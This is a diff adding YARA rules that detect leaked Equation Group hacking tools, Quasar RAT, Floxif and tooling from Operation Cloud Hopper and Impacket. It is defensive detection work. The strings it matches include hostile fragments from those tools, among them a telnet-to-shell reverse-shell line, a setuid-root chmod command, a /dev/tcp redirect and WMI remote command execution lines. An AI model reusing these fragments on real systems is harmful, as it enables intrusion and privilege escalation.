+rule EquationGroup_jackpop_RID2FAB : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:07:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%x:%d  --> %x:%d %d bytes" fullword ascii
+      $s1 = "client: can't bind to local address, are you root?" fullword ascii
+      $s2 = "Unable to register port" fullword ascii
+      $s3 = "Could not resolve destination" fullword ascii
+      $s4 = "raw troubles" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
+}
+
+rule EquationGroup_parsescan_RID3083 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:43:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
+      $s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_jscan_RID2ED2 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
+      $s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_promptkill_RID3111 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:06:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
+      $x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_epoxyresin_v1_0_0_RID333D : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 14:39:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] kernel not vulnerable" fullword ascii
+      $s1 = ".tmp.%d.XXXXXX" fullword ascii
+      $s2 = "[-] couldn't create temp file" fullword ascii
+      $s3 = "/boot/System.map-%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
+}
+
+rule EquationGroup_estopmoonlit_RID31F0 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] shellcode prepared, re-executing" fullword ascii
+      $x2 = "[-] kernel not vulnerable: prctl" fullword ascii
+      $x3 = "[-] shell failed" fullword ascii
+      $x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_envoytomato_RID3188 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:26:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[-] kernel not vulnerable" fullword ascii
+      $s2 = "[-] failed to spawn shell" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_smash_RID2EDF : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:33:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
+      $x2 = "no command given!! bailing..." fullword ascii
+      $x3 = "no port. assuming 22..." fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_ratload_RID2FAA : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:06:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/tmp/ratload.tmp.sh" fullword ascii
+      $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
+      $s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_ys_RID2DAF : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 10:42:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
+      $x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
+      $x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup_ewok_RID2E79 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:16:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Example: ewok -t target public" fullword ascii
+      $x2 = "Usage:  cleaner host community fake_prog" fullword ascii
+      $x3 = "-g  - Subset of -m that Green Spirit hits " fullword ascii
+      $x4 = "--- ewok version" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 80KB and 1 of them )
+}
+
+rule EquationGroup_xspy_RID2E97 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 60KB and all of them )
+}
+
+rule EquationGroup_estesfox_RID3034 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
+   condition: 
+      all of them
+}
+
+rule EquationGroup_elatedmonkey_1_0_1_1_RID3404 : APT DEMO G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 15:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-08-18"
+      hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
+      tags = "APT, DEMO, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
+      $s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
+      $s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
+      $s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
+   condition: 
+      filesize < 15KB and 2 of them
+}
+
+rule EquationGroup_scanner_RID2FAD : APT DEMO G0020 HKTL {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:07:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
+      tags = "APT, DEMO, G0020, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "program version netid     address             service         owner" fullword ascii
+      $x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
+      $x5 = "-scan winn %s one" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
+rule EquationGroup__ftshell_ftshell_v3_10_3_0_RID364E : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:50:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+      hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
+      $s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
+      $s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
+      $s4 = "# ftshell -- File Transfer Shell" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup__scanner_scanner_v2_1_2_RID357D : APT DEMO FILE G0020 HKTL {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:15:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
+      hash2 = "9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff"
+      tags = "APT, DEMO, FILE, G0020, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Welcome to the network scanning tool" fullword ascii
+      $s2 = "Scanning port %d" fullword ascii
+      $s3 = "/current/down/cmdout/scans" fullword ascii
+      $s4 = "Scan for SSH version" fullword ascii
+      $s5 = "program vers proto   port  service" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 100KB and 2 of them ) or ( all of them )
+}
+
+rule EquationGroup__ghost_sparc_ghost_x86_3_RID361A : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:41:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1"
+      hash2 = "82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target" fullword ascii
+      $x2 = "Sending shellcode as part of an open command..." fullword ascii
+      $x3 = "cmdshellcode" fullword ascii
+      $x4 = "You will not be able to run the shellcode. Exiting..." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 70KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup__pclean_v2_1_1_pclean_v2_1_1_4_RID3748 : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 17:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+      hash2 = "ab7f26faed8bc2341d0517d9cb2bbf41795f753cd21340887fc2803dc1b9a1dd"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+      $s2 = "e.g.: -n 1-1024,1080,6666,31337 " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 50KB and all of them )
+}
+
+rule EquationGroup__jparsescan_parsescan_5_RID35FF : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:37:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
+      hash2 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "# default is to dump out all scanned hosts found" fullword ascii
+      $s2 = "$bool .= \" -r \" if (/mibiisa.* -r/);" fullword ascii
+      $s3 = "sadmind is available on two ports, this also works)" fullword ascii
+      $s4 = "-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scan" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 40KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup__magicjack_v1_1_0_0_client_RID364E : APT DEMO FILE G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:50:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
+      tags = "APT, DEMO, FILE, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "temp = ((left >> 1) ^ right) & 0x55555555" fullword ascii
+      $s2 = "right ^= (temp <<  16) & 0xffffffff" fullword ascii
+      $s3 = "tempresult = \"\"" fullword ascii
+      $s4 = "num = self.bytes2long(data)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 80KB and 3 of them ) or ( all of them )
+}
+
+rule EquationGroup__ftshell_RID3014 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if { [string length $uRemoteUploadCommand]" fullword ascii
+      $s2 = "processUpload" fullword ascii
+      $s3 = "global dothisreallyquiet" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 100KB and 2 of them ) or ( all of them )
+}
+
+rule Quasar_RAT_1_RID2B54 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Quasar RAT"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+      date = "2017-04-07 09:01:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+      hash2 = "1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec"
+      hash3 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "DoUploadAndExecute" fullword ascii
+      $s2 = "DoDownloadAndExecute" fullword ascii
+      $s3 = "DoShellExecute" fullword ascii
+      $s4 = "set_Processname" fullword ascii
+      $op1 = { 04 1e fe 02 04 16 fe 01 60 } 
+      $op2 = { 00 17 03 1f 20 17 19 15 28 } 
+      $op3 = { 00 04 03 69 91 1b 40 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $s* ) or all of ( $op* ) )
+}
+
+rule Quasar_RAT_2_RID2B55 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Quasar RAT"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+      date = "2017-04-07 09:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+      hash2 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+      hash3 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "GetKeyloggerLogsResponse" fullword ascii
+      $x2 = "get_Keylogger" fullword ascii
+      $x3 = "HandleGetKeyloggerLogsResponse" fullword ascii
+      $s1 = "DoShellExecuteResponse" fullword ascii
+      $s2 = "GetPasswordsResponse" fullword ascii
+      $s3 = "GetStartupItemsResponse" fullword ascii
+      $s4 = "<GetGenReader>b__7" fullword ascii
+      $s5 = "RunHidden" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and $x1 ) or ( all of them )
+}
+
+rule Malware_Floxif_mpsvc_dll_RID30C4 : DEMO EXE FILE HIGHVOL MAL {
+   meta:
+      description = "Malware - Floxif"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-04-07 12:53:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14"
+      tags = "DEMO, EXE, FILE, HIGHVOL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 04 80 7a 03 01 75 04 8d 42 04 c3 8d 42 04 53 8b } 
+      $op2 = { 88 19 74 03 41 eb ea c6 42 03 01 5b c3 8b 4c 24 } 
+      $op3 = { ff 03 8d 00 f9 ff ff 88 01 eb a1 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule OpCloudHopper_WmiDLL_inMemory_RID324C : APT DEMO MAL {
+   meta:
+      description = "Malware related to Operation Cloud Hopper - Page 25"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+      date = "2017-04-07 13:59:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "wmi.dll 2>&1" ascii
+   condition: 
+      all of them
+}
+
+rule karmaSMB_RID29FF : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 02:50:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "bkarmaSMB_RID29FF.exe.manifest" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+}
+
+rule OpCloudHopper_lockdown_RID2FF5 : APT DEMO EXE FILE {
+   meta:
+      description = "Tools related to Operation Cloud Hopper"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 12:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ca61cef74573d9c1d19b8191c23cbd2b7a1195a74eaba037377e5ee232b1dc5"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "lockdown.dll" fullword ascii
+      $s3 = "mfeann.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule OpCloudHopper_WindowXarBot_RID315C : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Malware related to Operation Cloud Hopper"
+      author = "Florian Roth"
+      reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+      date = "2017-04-07 13:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\WindowXarbot.pdb" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule VBS_WMIExec_Tool_Apr17_1_RID2F44 : APT DEMO SCRIPT {
+   meta:
+      description = "Tools related to Operation Cloud Hopper"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 11:49:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "strNetUse = \"cmd.exe /c net use \\\\\" & host" fullword ascii
+      $x2 = "localcmd = \"cmd.exe /c \" & command " ascii
+      $x3 = "& \" > \" & TempFile & \" 2>&1\"  '2>&1 err" fullword ascii
+      $x4 = "strExec = \"cmd.exe /c \" & cmd & \" >> \" & resultfile & \" 2>&1\"  '2>&1 err" fullword ascii
+      $x5 = "TempFile = objShell.ExpandEnvironmentStrings(\"%TEMP%\") & \"\\wmi.dll\"" fullword ascii
+      $a1 = "WMIEXEC ERROR: Command -> " ascii
+      $a2 = "WMIEXEC : Command result will output to" fullword ascii
+      $a3 = "WMIEXEC : Target ->" fullword ascii
+      $a4 = "WMIEXEC : Login -> OK" fullword ascii
+      $a5 = "WMIEXEC : Process created. PID:" fullword ascii
+   condition: 
+      ( filesize < 40KB and 1 of them ) or 3 of them
+}
+
+rule samrdump_RID2A7A : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
+      reference = "https://github.com/maaaaz/impacket-examples-windows"
+      date = "2017-04-07 06:15:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "bsamrdump_RID2A7A.exe.manifest" fullword ascii
+      $s3 = "ssamrdump_RID2A7A" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+}
+
+rule Impacket_Tools_opdump_RID2FA3 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Compiled Impacket Tools"
+      author = "Florian Roth"
